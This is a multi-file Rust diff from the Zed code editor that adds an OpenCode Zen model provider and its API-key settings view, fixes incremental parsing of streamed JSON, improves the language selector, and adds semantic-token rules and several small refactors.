+ let stream = self.stream_google_zen(google_request, cx);
+ async move {
+ let mapper = GoogleEventMapper::new();
+ Ok(mapper.map_stream(stream.await?.boxed()).boxed())
+ }
+ .boxed()
+ }
+ }
+ }
+}
+
+struct ConfigurationView {
+ api_key_editor: Entity<InputField>,
+ state: Entity<State>,
+ load_credentials_task: Option<Task<()>>,
+}
+
+impl ConfigurationView {
+ fn new(state: Entity<State>, window: &mut Window, cx: &mut Context<Self>) -> Self {
+ let api_key_editor = cx.new(|cx| {
+ InputField::new(window, cx, "sk-00000000000000000000000000000000").label("API key")
+ });
+
+ cx.observe(&state, |_, _, cx| {
+ cx.notify();
+ })
+ .detach();
+
+ let load_credentials_task = Some(cx.spawn_in(window, {
+ let state = state.clone();
+ async move |this, cx| {
+ if let Some(task) = Some(state.update(cx, |state, cx| state.authenticate(cx))) {
+ let _ = task.await;
+ }
+ this.update(cx, |this, cx| {
+ this.load_credentials_task = None;
+ cx.notify();
+ })
+ .log_err();
+ }
+ }));
+
+ Self {
+ api_key_editor,
+ state,
+ load_credentials_task,
+ }
+ }
+
+ fn save_api_key(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context<Self>) {
+ let api_key = self.api_key_editor.read(cx).text(cx).trim().to_string();
+ if api_key.is_empty() {
+ return;
+ }
+
+ self.api_key_editor
+ .update(cx, |editor, cx| editor.set_text("", window, cx));
+
+ let state = self.state.clone();
+ cx.spawn_in(window, async move |_, cx| {
+ state
+ .update(cx, |state, cx| state.set_api_key(Some(api_key), cx))
+ .await
+ })
+ .detach_and_log_err(cx);
+ }
+
+ fn reset_api_key(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ self.api_key_editor
+ .update(cx, |editor, cx| editor.set_text("", window, cx));
+
+ let state = self.state.clone();
+ cx.spawn_in(window, async move |_, cx| {
+ state
+ .update(cx, |state, cx| state.set_api_key(None, cx))
+ .await
+ })
+ .detach_and_log_err(cx);
+ }
+
+ fn should_render_editor(&self, cx: &mut Context<Self>) -> bool {
+ !self.state.read(cx).is_authenticated()
+ }
+}
+
+impl Render for ConfigurationView {
+ fn render(&mut self, _: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let env_var_set = self.state.read(cx).api_key_state.is_from_env_var();
+ let configured_card_label = if env_var_set {
+ format!("API key set in {API_KEY_ENV_VAR_NAME} environment variable")
+ } else {
+ let api_url = OpenCodeLanguageModelProvider::api_url(cx);
+ if api_url == OPENCODE_API_URL {
+ "API key configured".to_string()
+ } else {
+ format!("API key configured for {}", api_url)
+ }
+ };
+
+ let api_key_section = if self.should_render_editor(cx) {
+ v_flex()
+ .on_action(cx.listener(Self::save_api_key))
+ .child(Label::new(
+ "To use OpenCode Zen models in Zed, you need an API key:",
+ ))
+ .child(
+ List::new()
+ .child(
+ ListBulletItem::new("")
+ .child(Label::new("Sign in and get your key at"))
+ .child(ButtonLink::new(
+ "OpenCode Zen Console",
+ "https://opencode.ai/zen",
+ )),
+ )
+ .child(ListBulletItem::new(
+ "Paste your API key below and hit enter to start using OpenCode Zen",
+ )),
+ )
+ .child(self.api_key_editor.clone())
+ .child(
+ Label::new(format!(
+ "You can also set the {API_KEY_ENV_VAR_NAME} environment variable and restart Zed."
+ ))
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .into_any_element()
+ } else {
+ ConfiguredApiCard::new(configured_card_label)
+ .disabled(env_var_set)
+ .when(env_var_set, |this| {
+ this.tooltip_label(format!(
+ "To reset your API key, unset the {API_KEY_ENV_VAR_NAME} environment variable."
+ ))
+ })
+ .on_click(cx.listener(|this, _, window, cx| this.reset_api_key(window, cx)))
+ .into_any_element()
+ };
+
+ if self.load_credentials_task.is_some() {
+ div().child(Label::new("Loading credentials...")).into_any()
+ } else {
+ v_flex().size_full().child(api_key_section).into_any()
+ }
+ }
+}
@@ -11,3 +11,99 @@ pub fn parse_tool_arguments(arguments: &str) -> Result<serde_json::Value, serde_
serde_json::Value::from_str(arguments)
}
}
+
+/// `partial_json_fixer::fix_json` converts a trailing `\` inside a string into `\\`
+/// (a literal backslash). When used for incremental parsing (comparing successive
+/// parses to extract deltas), this produces a spurious backslash character that
+/// doesn't exist in the final text, corrupting the output.
+///
+/// This function strips any trailing incomplete escape sequence before fixing,
+/// so each intermediate parse produces a true prefix of the final string value.
+pub fn fix_streamed_json(partial_json: &str) -> String {
+ let json = strip_trailing_incomplete_escape(partial_json);
+ partial_json_fixer::fix_json(json)
+}
+
+fn strip_trailing_incomplete_escape(json: &str) -> &str {
+ let trailing_backslashes = json
+ .as_bytes()
+ .iter()
+ .rev()
+ .take_while(|&&b| b == b'\\')
+ .count();
+ if trailing_backslashes % 2 == 1 {
+ &json[..json.len() - 1]
+ } else {
+ json
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn test_fix_streamed_json_strips_incomplete_escape() {
+ // Trailing `\` inside a string — incomplete escape sequence
+ let fixed = fix_streamed_json(r#"{"text": "hello\"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "hello");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_preserves_complete_escape() {
+ // `\\` is a complete escape (literal backslash)
+ let fixed = fix_streamed_json(r#"{"text": "hello\\"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "hello\\");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_strips_escape_after_complete_escape() {
+ // `\\\` = complete `\\` (literal backslash) + incomplete `\`
+ let fixed = fix_streamed_json(r#"{"text": "hello\\\"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "hello\\");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_no_escape_at_end() {
+ let fixed = fix_streamed_json(r#"{"text": "hello"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "hello");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_newline_escape_boundary() {
+ // Simulates a stream boundary landing between `\` and `n`
+ let fixed = fix_streamed_json(r#"{"text": "line1\"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "line1");
+
+ // Next chunk completes the escape
+ let fixed = fix_streamed_json(r#"{"text": "line1\nline2"#);
+ let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json");
+ assert_eq!(parsed["text"], "line1\nline2");
+ }
+
+ #[test]
+ fn test_fix_streamed_json_incremental_delta_correctness() {
+ // This is the actual scenario that causes the bug:
+ // chunk 1 ends mid-escape, chunk 2 completes it.
+ let chunk1 = r#"{"replacement_text": "fn foo() {\"#;
+ let fixed1 = fix_streamed_json(chunk1);
+ let parsed1: serde_json::Value = serde_json::from_str(&fixed1).expect("valid json");
+ let text1 = parsed1["replacement_text"].as_str().expect("string");
+ assert_eq!(text1, "fn foo() {");
+
+ let chunk2 = r#"{"replacement_text": "fn foo() {\n return bar;\n}"}"#;
+ let fixed2 = fix_streamed_json(chunk2);
+ let parsed2: serde_json::Value = serde_json::from_str(&fixed2).expect("valid json");
+ let text2 = parsed2["replacement_text"].as_str().expect("string");
+ assert_eq!(text2, "fn foo() {\n return bar;\n}");
+
+ // The delta should be the newline + rest, with no spurious backslash
+ let delta = &text2[text1.len()..];
+ assert_eq!(delta, "\n return bar;\n}");
+ }
+}
@@ -288,6 +288,10 @@ impl LanguageModel for XAiLanguageModel {
self.model.max_output_tokens()
}
+ fn supports_split_token_display(&self) -> bool {
+ true
+ }
+
fn count_tokens(
&self,
request: LanguageModelRequest,
@@ -8,7 +8,8 @@ use crate::provider::{
deepseek::DeepSeekSettings, google::GoogleSettings, lmstudio::LmStudioSettings,
mistral::MistralSettings, ollama::OllamaSettings, open_ai::OpenAiSettings,
open_ai_compatible::OpenAiCompatibleSettings, open_router::OpenRouterSettings,
- vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings, x_ai::XAiSettings,
+ opencode::OpenCodeSettings, vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings,
+ x_ai::XAiSettings,
};
#[derive(Debug, RegisterSetting)]
@@ -20,6 +21,7 @@ pub struct AllLanguageModelSettings {
pub lmstudio: LmStudioSettings,
pub mistral: MistralSettings,
pub ollama: OllamaSettings,
+ pub opencode: OpenCodeSettings,
pub open_router: OpenRouterSettings,
pub openai: OpenAiSettings,
pub openai_compatible: HashMap<Arc<str>, OpenAiCompatibleSettings>,
@@ -41,6 +43,7 @@ impl settings::Settings for AllLanguageModelSettings {
let lmstudio = language_models.lmstudio.unwrap();
let mistral = language_models.mistral.unwrap();
let ollama = language_models.ollama.unwrap();
+ let opencode = language_models.opencode.unwrap();
let open_router = language_models.open_router.unwrap();
let openai = language_models.openai.unwrap();
let openai_compatible = language_models.openai_compatible.unwrap();
@@ -85,6 +88,10 @@ impl settings::Settings for AllLanguageModelSettings {
available_models: ollama.available_models.unwrap_or_default(),
context_window: ollama.context_window,
},
+ opencode: OpenCodeSettings {
+ api_url: opencode.api_url.unwrap(),
+ available_models: opencode.available_models.unwrap_or_default(),
+ },
open_router: OpenRouterSettings {
api_url: open_router.api_url.unwrap(),
available_models: open_router.available_models.unwrap_or_default(),
@@ -23,7 +23,7 @@ impl BasedPyrightBanner {
this.have_basedpyright = true;
}
});
- let dismissed = Self::dismissed();
+ let dismissed = Self::dismissed(cx);
Self {
dismissed,
have_basedpyright: false,
@@ -56,10 +56,8 @@ impl Render for BasedPyrightBanner {
.gap_0p5()
.child(
Button::new("learn-more", "Learn More")
- .icon(IconName::ArrowUpRight)
.label_size(LabelSize::Small)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::XSmall).color(Color::Muted))
.on_click(|_, _, cx| {
cx.open_url("https://zed.dev/docs/languages/python")
}),
@@ -280,20 +280,28 @@ impl PickerDelegate for LanguageSelectorDelegate {
};
this.update_in(cx, |this, window, cx| {
- let delegate = &mut this.delegate;
- delegate.matches = matches;
- delegate.selected_index = delegate
- .selected_index
- .min(delegate.matches.len().saturating_sub(1));
-
- if query_is_empty {
- if let Some(index) = delegate
- .current_language_candidate_index
- .and_then(|ci| delegate.matches.iter().position(|m| m.candidate_id == ci))
- {
- this.set_selected_index(index, None, false, window, cx);
- }
+ if matches.is_empty() {
+ this.delegate.matches = matches;
+ this.delegate.selected_index = 0;
+ cx.notify();
+ return;
}
+
+ let selected_index = if query_is_empty {
+ this.delegate
+ .current_language_candidate_index
+ .and_then(|current_language_candidate_index| {
+ matches.iter().position(|mat| {
+ mat.candidate_id == current_language_candidate_index
+ })
+ })
+ .unwrap_or(0)
+ } else {
+ 0
+ };
+
+ this.delegate.matches = matches;
+ this.set_selected_index(selected_index, None, false, window, cx);
cx.notify();
})
.log_err();
@@ -345,28 +353,25 @@ mod tests {
fn register_test_languages(project: &Entity<Project>, cx: &mut VisualTestContext) {
project.read_with(cx, |project, _| {
let language_registry = project.languages();
- language_registry.add(Arc::new(Language::new(
- LanguageConfig {
- name: "Rust".into(),
- matcher: LanguageMatcher {
- path_suffixes: vec!["rs".to_string()],
- ..Default::default()
- },
- ..Default::default()
- },
- None,
- )));
- language_registry.add(Arc::new(Language::new(
- LanguageConfig {
- name: "TypeScript".into(),
- matcher: LanguageMatcher {
- path_suffixes: vec!["ts".to_string()],
+ for (language_name, path_suffix) in [
+ ("C", "c"),
+ ("Go", "go"),
+ ("Ruby", "rb"),
+ ("Rust", "rs"),
+ ("TypeScript", "ts"),
+ ] {
+ language_registry.add(Arc::new(Language::new(
+ LanguageConfig {
+ name: language_name.into(),
+ matcher: LanguageMatcher {
+ path_suffixes: vec![path_suffix.to_string()],
+ ..Default::default()
+ },
..Default::default()
},
- ..Default::default()
- },
- None,
- )));
+ None,
+ )));
+ }
});
}
@@ -406,6 +411,24 @@ mod tests {
workspace: &Entity<Workspace>,
project: &Entity<Project>,
cx: &mut VisualTestContext,
+ ) -> Entity<Editor> {
+ let editor = open_new_buffer_editor(workspace, project, cx).await;
+ // Ensure the buffer has no language after the editor is created
+ let (_, buffer, _) = editor.read_with(cx, |editor, cx| {
+ editor
+ .active_excerpt(cx)
+ .expect("editor should have an active excerpt")
+ });
+ buffer.update(cx, |buffer, cx| {
+ buffer.set_language(None, cx);
+ });
+ editor
+ }
+
+ async fn open_new_buffer_editor(
+ workspace: &Entity<Workspace>,
+ project: &Entity<Project>,
+ cx: &mut VisualTestContext,
) -> Entity<Editor> {
let create_buffer = project.update(cx, |project, cx| project.create_buffer(None, true, cx));
let buffer = create_buffer.await.expect("empty buffer should be created");
@@ -415,10 +438,6 @@ mod tests {
workspace.update_in(cx, |workspace, window, cx| {
workspace.add_item_to_center(Box::new(editor.clone()), window, cx);
});
- // Ensure the buffer has no language after the editor is created
- buffer.update(cx, |buffer, cx| {
- buffer.set_language(None, cx);
- });
editor
}
@@ -559,15 +578,86 @@ mod tests {
assert_selected_language_for_editor(&workspace, &rust_editor, Some("Rust"), cx);
assert_selected_language_for_editor(&workspace, &typescript_editor, Some("TypeScript"), cx);
- // Ensure the empty editor's buffer has no language before asserting
- let (_, buffer, _) = empty_editor.read_with(cx, |editor, cx| {
- editor
- .active_excerpt(cx)
- .expect("editor should have an active excerpt")
+ assert_selected_language_for_editor(&workspace, &empty_editor, None, cx);
+ }
+
+ #[gpui::test]
+ async fn test_language_selector_selects_first_match_after_querying_new_buffer(
+ cx: &mut TestAppContext,
+ ) {
+ let app_state = init_test(cx);
+ app_state
+ .fs
+ .as_fake()
+ .insert_tree(path!("/test"), json!({}))
+ .await;
+
+ let project = Project::test(app_state.fs.clone(), [path!("/test").as_ref()], cx).await;
+ let (multi_workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace =
+ multi_workspace.read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone());
+ register_test_languages(&project, cx);
+
+ let editor = open_new_buffer_editor(&workspace, &project, cx).await;
+ workspace.update_in(cx, |workspace, window, cx| {
+ let was_activated = workspace.activate_item(&editor, true, true, window, cx);
+ assert!(
+ was_activated,
+ "editor should be activated before opening the modal"
+ );
});
- buffer.update(cx, |buffer, cx| {
- buffer.set_language(None, cx);
+ cx.run_until_parked();
+
+ let picker = open_selector(&workspace, cx);
+ picker.read_with(cx, |picker, _| {
+ let selected_match = picker
+ .delegate
+ .matches
+ .get(picker.delegate.selected_index)
+ .expect("selected index should point to a match");
+ let selected_candidate = picker
+ .delegate
+ .candidates
+ .get(selected_match.candidate_id)
+ .expect("selected match should map to a candidate");
+
+ assert_eq!(selected_candidate.string, "Plain Text");
+ assert!(
+ picker
+ .delegate
+ .current_language_candidate_index
+ .is_some_and(|current_language_candidate_index| {
+ current_language_candidate_index > 1
+ }),
+ "test setup should place Plain Text after at least two earlier languages",
+ );
+ });
+
+ picker.update_in(cx, |picker, window, cx| {
+ picker.update_matches("ru".to_string(), window, cx)
+ });
+ cx.run_until_parked();
+
+ picker.read_with(cx, |picker, _| {
+ assert!(
+ picker.delegate.matches.len() > 1,
+ "query should return multiple matches"
+ );
+ assert_eq!(picker.delegate.selected_index, 0);
+
+ let first_match = picker
+ .delegate
+ .matches
+ .first()
+ .expect("query should produce at least one match");
+ let selected_match = picker
+ .delegate
+ .matches
+ .get(picker.delegate.selected_index)
+ .expect("selected index should point to a match");
+
+ assert_eq!(selected_match.candidate_id, first_match.candidate_id);
});
- assert_selected_language_for_editor(&workspace, &empty_editor, None, cx);
}
}
@@ -209,20 +209,32 @@ impl HighlightsTreeView {
window: &mut Window,
cx: &mut Context<Self>,
) {
- let Some(editor) = active_item
- .filter(|item| item.item_id() != cx.entity_id())
- .and_then(|item| item.downcast::<Editor>())
- else {
- self.clear(cx);
- return;
+ let active_editor = match active_item {
+ Some(active_item) => {
+ if active_item.item_id() == cx.entity_id() {
+ return;
+ } else {
+ match active_item.downcast::<Editor>() {
+ Some(active_editor) => active_editor,
+ None => {
+ self.clear(cx);
+ return;
+ }
+ }
+ }
+ }
+ None => {
+ self.clear(cx);
+ return;
+ }
};
let is_different_editor = self
.editor
.as_ref()
- .is_none_or(|state| state.editor != editor);
+ .is_none_or(|state| state.editor != active_editor);
if is_different_editor {
- self.set_editor(editor, window, cx);
+ self.set_editor(active_editor, window, cx);
}
}
@@ -230,7 +230,7 @@ impl LanguageServerState {
(
server_id,
(
- status.server_version.clone(),
+ status.server_readable_version.clone(),
status.binary.as_ref().map(|b| b.path.clone()),
status.process_id,
),
@@ -18,7 +18,7 @@ use project::{
};
use proto::toggle_lsp_logs::LogType;
use std::{any::TypeId, borrow::Cow, sync::Arc};
-use ui::{Button, Checkbox, ContextMenu, Label, PopoverMenu, ToggleState, prelude::*};
+use ui::{Checkbox, ContextMenu, PopoverMenu, ToggleState, prelude::*};
use util::ResultExt as _;
use workspace::{
SplitDirection, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace, WorkspaceId,
@@ -969,9 +969,11 @@ impl Render for LspLogToolbarItemView {
})
.unwrap_or_else(|| "No server selected".into()),
)
- .icon(IconName::ChevronDown)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted),
+ .end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ ),
)
.menu({
let log_view = log_view.clone();
@@ -1030,10 +1032,11 @@ impl Render for LspLogToolbarItemView {
PopoverMenu::new("LspViewSelector")
.anchor(Corner::TopLeft)
.trigger(
- Button::new("language_server_menu_header", label)
- .icon(IconName::ChevronDown)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted),
+ Button::new("language_server_menu_header", label).end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ ),
)
.menu(move |window, cx| {
let log_toolbar_view = log_toolbar_view.upgrade()?;
@@ -1125,9 +1128,11 @@ impl Render for LspLogToolbarItemView {
"language_server_trace_level_selector",
"Trace level",
)
- .icon(IconName::ChevronDown)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted),
+ .end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ ),
)
.menu({
let log_view = log_view;
@@ -1193,9 +1198,11 @@ impl Render for LspLogToolbarItemView {
"language_server_log_level_selector",
"Log level",
)
- .icon(IconName::ChevronDown)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted),
+ .end_icon(
+ Icon::new(IconName::ChevronDown)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ ),
)
.menu({
let log_view = log_view;
@@ -1348,6 +1355,7 @@ impl ServerInfo {
status: LanguageServerStatus {
name: server.name(),
server_version: server.version(),
+ server_readable_version: server.readable_version(),
pending_work: Default::default(),
has_pending_diagnostic_updates: false,
progress_tokens: Default::default(),
@@ -1,3 +1,15 @@
+use settings::SemanticTokenRules;
+
+use crate::LanguageDir;
+
+pub(crate) fn semantic_token_rules() -> SemanticTokenRules {
+ let content = LanguageDir::get("cpp/semantic_token_rules.json")
+ .expect("missing cpp/semantic_token_rules.json");
+ let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules");
+ settings::parse_json_with_comments::<SemanticTokenRules>(json)
+ .expect("failed to parse cpp semantic_token_rules.json")
+}
+
#[cfg(test)]
mod tests {
use gpui::{AppContext as _, BorrowAppContext, TestAppContext};
@@ -1,6 +1,6 @@
name = "C++"
grammar = "cpp"
-path_suffixes = ["cc", "hh", "cpp", "cppm", "h", "hpp", "cxx", "hxx", "c++", "h++", "ipp", "inl", "ino", "ixx", "cu", "cuh", "C", "H"]
+path_suffixes = ["cc", "ccm", "hh", "cpp", "cppm", "h", "hpp", "cxx", "cxxm", "hxx", "c++", "c++m", "h++", "ipp", "inl", "ino", "ixx", "cu", "cuh", "C", "H"]
line_comments = ["// ", "/// ", "//! "]
first_line_pattern = '^//.*-\*-\s*C\+\+\s*-\*-'
decrease_indent_patterns = [
@@ -0,0 +1,7 @@
+[
+ {
+ "token_type": "variable",
+ "token_modifiers": ["readonly"],
+ "style": ["constant"]
+ }
+]
@@ -7,7 +7,7 @@ path_suffixes = [
"NOTES_EDITMSG",
"EDIT_DESCRIPTION",
]
-line_comments = ["#"]
+line_comments = ["# "]
brackets = [
{ start = "(", end = ")", close = true, newline = false },
{ start = "`", end = "`", close = true, newline = false },
@@ -5,7 +5,10 @@ use futures::StreamExt;
use gpui::{App, AsyncApp, Task};
use http_client::github::latest_github_release;
pub use language::*;
-use language::{LanguageToolchainStore, LspAdapterDelegate, LspInstaller};
+use language::{
+ LanguageName, LanguageToolchainStore, LspAdapterDelegate, LspInstaller,
+ language_settings::language_settings,
+};
use lsp::{LanguageServerBinary, LanguageServerName};
use project::lsp_store::language_server_settings;
@@ -207,6 +210,12 @@ impl LspAdapter for GoLspAdapter {
delegate: &Arc<dyn LspAdapterDelegate>,
cx: &mut AsyncApp,
) -> Result<Option<serde_json::Value>> {
+ let semantic_tokens_enabled = cx.update(|cx| {
+ language_settings(Some(LanguageName::new("Go")), None, cx)
+ .semantic_tokens
+ .enabled()
+ });
+
let mut default_config = json!({
"usePlaceholders": false,
"hints": {
@@ -217,7 +226,8 @@ impl LspAdapter for GoLspAdapter {
"functionTypeParameters": true,
"parameterNames": true,
"rangeVariableTypes": true
- }
+ },
+ "semanticTokens": semantic_tokens_enabled
});
let project_initialization_options = cx.update(|cx| {
@@ -2,7 +2,7 @@ name = "Go Mod"
code_fence_block_name = "go.mod"
grammar = "gomod"
path_suffixes = ["mod"]
-line_comments = ["//"]
+line_comments = ["// "]
autoclose_before = ")"
brackets = [
{ start = "(", end = ")", close = true, newline = true}
@@ -2,7 +2,7 @@ name = "Go Work"
code_fence_block_name = "gowork"
grammar = "gowork"
path_suffixes = ["work"]
-line_comments = ["//"]
+line_comments = ["// "]
autoclose_before = ")"
brackets = [
{ start = "(", end = ")", close = true, newline = true}
@@ -247,7 +247,6 @@
"abstract"
"as"
"async"
- "await"
"debugger"
"declare"
"default"
@@ -294,6 +293,7 @@
] @keyword.import
[
+ "await"
"break"
"case"
"catch"
@@ -1,6 +1,6 @@
name = "JSONC"
grammar = "jsonc"
-path_suffixes = ["jsonc", "bun.lock", "devcontainer.json", "pyrightconfig.json", "tsconfig.json", "luaurc"]
+path_suffixes = ["jsonc", "bun.lock", "devcontainer.json", "pyrightconfig.json", "tsconfig.json", "luaurc", "swcrc", "babelrc", "eslintrc", "stylelintrc"]
line_comments = ["// "]
autoclose_before = ",]}"
brackets = [
@@ -125,6 +125,7 @@ pub fn init(languages: Arc<LanguageRegistry>, fs: Arc<dyn Fs>, node: NodeRuntime
LanguageInfo {
name: "cpp",
adapters: vec![c_lsp_adapter],
+ semantic_token_rules: Some(cpp::semantic_token_rules()),
..Default::default()
},
LanguageInfo {
@@ -190,7 +191,7 @@ pub fn init(languages: Arc<LanguageRegistry>, fs: Arc<dyn Fs>, node: NodeRuntime
context: Some(python_context_provider),
toolchain: Some(python_toolchain_provider),
manifest_name: Some(SharedString::new_static("pyproject.toml").into()),
- ..Default::default()
+ semantic_token_rules: Some(python::semantic_token_rules()),
},
LanguageInfo {
name: "rust",
@@ -21,7 +21,10 @@
(list_marker_parenthesis)
] @punctuation.list_marker.markup
-(block_quote_marker) @punctuation.markup
+[
+ (block_quote_marker)
+ (block_continuation)
+] @punctuation.markup
(pipe_table_header
"|" @punctuation.markup)
@@ -24,7 +24,7 @@ use project::lsp_store::language_server_settings;
use semver::Version;
use serde::{Deserialize, Serialize};
use serde_json::{Value, json};
-use settings::Settings;
+use settings::{SemanticTokenRules, Settings};
use terminal::terminal_settings::TerminalSettings;
use smol::lock::OnceCell;
@@ -37,6 +37,7 @@ use util::fs::{make_file_executable, remove_matching};
use util::paths::PathStyle;
use util::rel_path::RelPath;
+use crate::LanguageDir;
use http_client::github_download::{GithubBinaryMetadata, download_server_binary};
use parking_lot::Mutex;
use std::str::FromStr;
@@ -49,6 +50,14 @@ use std::{
use task::{ShellKind, TaskTemplate, TaskTemplates, VariableName};
use util::{ResultExt, maybe};
+pub(crate) fn semantic_token_rules() -> SemanticTokenRules {
+ let content = LanguageDir::get("python/semantic_token_rules.json")
+ .expect("missing python/semantic_token_rules.json");
+ let json = std::str::from_utf8(&content.data).expect("invalid utf-8 in semantic_token_rules");
+ settings::parse_json_with_comments::<SemanticTokenRules>(json)
+ .expect("failed to parse python semantic_token_rules.json")
+}
+
#[derive(Debug, Serialize, Deserialize)]
pub(crate) struct PythonToolchainData {
#[serde(flatten)]
@@ -159,6 +168,75 @@ fn process_pyright_completions(items: &mut [lsp::CompletionItem]) {
}
}
+fn label_for_pyright_completion(
+ item: &lsp::CompletionItem,
+ language: &Arc<language::Language>,
+) -> Option<language::CodeLabel> {
+ let label = &item.label;
+ let label_len = label.len();
+ let grammar = language.grammar()?;
+ let highlight_id = match item.kind? {
+ lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"),
+ lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"),
+ lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"),
+ lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"),
+ lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"),
+ _ => {
+ return None;
+ }
+ };
+ let mut text = label.clone();
+ if let Some(completion_details) = item
+ .label_details
+ .as_ref()
+ .and_then(|details| details.description.as_ref())
+ {
+ write!(&mut text, " {}", completion_details).ok();
+ }
+ Some(language::CodeLabel::filtered(
+ text,
+ label_len,
+ item.filter_text.as_deref(),
+ highlight_id
+ .map(|id| (0..label_len, id))
+ .into_iter()
+ .collect(),
+ ))
+}
+
+fn label_for_python_symbol(
+ symbol: &Symbol,
+ language: &Arc<language::Language>,
+) -> Option<language::CodeLabel> {
+ let name = &symbol.name;
+ let (text, filter_range, display_range) = match symbol.kind {
+ lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => {
+ let text = format!("def {}():\n", name);
+ let filter_range = 4..4 + name.len();
+ let display_range = 0..filter_range.end;
+ (text, filter_range, display_range)
+ }
+ lsp::SymbolKind::CLASS => {
+ let text = format!("class {}:", name);
+ let filter_range = 6..6 + name.len();
+ let display_range = 0..filter_range.end;
+ (text, filter_range, display_range)
+ }
+ lsp::SymbolKind::CONSTANT => {
+ let text = format!("{} = 0", name);
+ let filter_range = 0..name.len();
+ let display_range = 0..filter_range.end;
+ (text, filter_range, display_range)
+ }
+ _ => return None,
+ };
+ Some(language::CodeLabel::new(
+ text[display_range.clone()].to_string(),
+ filter_range,
+ language.highlight_text(&text.as_str().into(), display_range),
+ ))
+}
+
pub struct TyLspAdapter {
fs: Arc<dyn Fs>,
}
@@ -255,6 +333,14 @@ impl LspAdapter for TyLspAdapter {
))
}
+ async fn label_for_symbol(
+ &self,
+ symbol: &language::Symbol,
+ language: &Arc<language::Language>,
+ ) -> Option<language::CodeLabel> {
+ label_for_python_symbol(symbol, language)
+ }
+
async fn workspace_configuration(
self: Arc<Self>,
delegate: &Arc<dyn LspAdapterDelegate>,
@@ -531,36 +617,7 @@ impl LspAdapter for PyrightLspAdapter {
item: &lsp::CompletionItem,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let label = &item.label;
- let label_len = label.len();
- let grammar = language.grammar()?;
- let highlight_id = match item.kind? {
- lsp::CompletionItemKind::METHOD => grammar.highlight_id_for_name("function.method"),
- lsp::CompletionItemKind::FUNCTION => grammar.highlight_id_for_name("function"),
- lsp::CompletionItemKind::CLASS => grammar.highlight_id_for_name("type"),
- lsp::CompletionItemKind::CONSTANT => grammar.highlight_id_for_name("constant"),
- lsp::CompletionItemKind::VARIABLE => grammar.highlight_id_for_name("variable"),
- _ => {
- return None;
- }
- };
- let mut text = label.clone();
- if let Some(completion_details) = item
- .label_details
- .as_ref()
- .and_then(|details| details.description.as_ref())
- {
- write!(&mut text, " {}", completion_details).ok();
- }
- Some(language::CodeLabel::filtered(
- text,
- label_len,
- item.filter_text.as_deref(),
- highlight_id
- .map(|id| (0..label_len, id))
- .into_iter()
- .collect(),
- ))
+ label_for_pyright_completion(item, language)
}
async fn label_for_symbol(
@@ -568,34 +625,7 @@ impl LspAdapter for PyrightLspAdapter {
symbol: &language::Symbol,
language: &Arc<language::Language>,
) -> Option<language::CodeLabel> {
- let name = &symbol.name;
- let (text, filter_range, display_range) = match symbol.kind {
- lsp::SymbolKind::METHOD | lsp::SymbolKind::FUNCTION => {
- let text = format!("def {}():\n", name);
- let filter_range = 4..4 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CLASS => {
- let text = format!("class {}:", name);
- let filter_range = 6..6 + name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- lsp::SymbolKind::CONSTANT => {
- let text = format!("{} = 0", name);
- let filter_range = 0..name.len();
- let display_range = 0..filter_range.end;
- (text, filter_range, display_range)
- }
- _ => return None,
- };
-
- Some(language::CodeLabel::new(
- text[display_range.clone()].to_string(),
- filter_range,
- language.highlight_text(&text.as_str().into(), display_range),
- ))
+ label_for_python_symbol(symbol, language)
}
async fn workspace_configuration(
@@ -1080,6 +1110,7 @@ fn python_env_kind_display(k: &PythonEnvironmentKind) -> &'static str {
PythonEnvironmentKind::Venv => "venv",
PythonEnvironmentKind::VirtualEnv => "virtualenv",
PythonEnvironmentKind::VirtualEnvWrapper => "virtualenvwrapper",
+ PythonEnvironmentKind::WinPython => "WinPython",
PythonEnvironmentKind::WindowsStore => "global (Windows Store)",
